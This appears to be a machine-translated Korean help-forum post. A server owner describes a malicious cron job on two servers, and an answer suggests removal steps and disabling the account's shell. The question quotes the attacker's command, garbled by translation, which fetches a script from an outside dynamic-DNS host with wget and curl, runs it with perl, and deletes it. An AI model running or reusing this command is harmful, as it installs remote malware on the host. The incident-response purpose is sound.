며칠 전부터 알 수 없는 크론 작업 실행에 대한 알림을 보내기 시작한 두 개의 전용 서버가 있습니다.
두 서버 모두 내 웹사이트에 대한 보조 계정이 있고 해커는 루트가 아닌 해당 계정에 대한 크론 작업을 수정했습니다. 그래서 나는 "아마도" 그들이 제한된 접근권만을 가지고 있다고 생각합니다.
둘 다 다음을 실행하려고 합니다: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;컬-영형http://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
첫 번째 서버의 Cronjob 출력:
http://pastebin.com/m56ga6pp
두 번째 서버의 Cronjob 출력:
http://pastebin.com/4utZ8agC
이상한 점은 두 서버가 동시에 동일한 방법을 사용하여 해킹된 것처럼 보인다는 것입니다.
어떻게 침입했는지, 다시 설치하지 않고도 제거할 수 있는지에 대한 아이디어를 제공할 수 있는 이런 종류의 해킹을 정확히 수행한 사람이 있습니까?
서버에는 많은 웹사이트가 있는데 첫 번째 웹사이트는 약 500GB를 사용하므로 다른 곳으로 이동하고 다시 설치하는 데 많은 시간이 걸립니다.
미리 감사드립니다!
답변1
Pastebin 출력을 보면 cron 작업이 해시를 생성하려고 시도하는 것으로 보입니다. 저는 그 사람이 서버를 암호화폐 채굴 풀의 일부로 사용하려고 한다고 의심합니다.
그가 어떻게 침입했는지에 대한 자세한 내용을 알아보려면 다양한 로그가 필요하며, 그런 행위를 한 사람이 웹사이트 소유자가 아니라고 100% 확신하십니까? cronjob을 사용하면 쉽게 제거할 수 있습니다.
crontab -e
그 사람이 다시 들어오는 것을 방지하기 위해 특정 사용자가 쉘 액세스를 가질 이유가 없다면 쉘 액세스를 비활성화합니다.
chsh -s /sbin/nologin {username}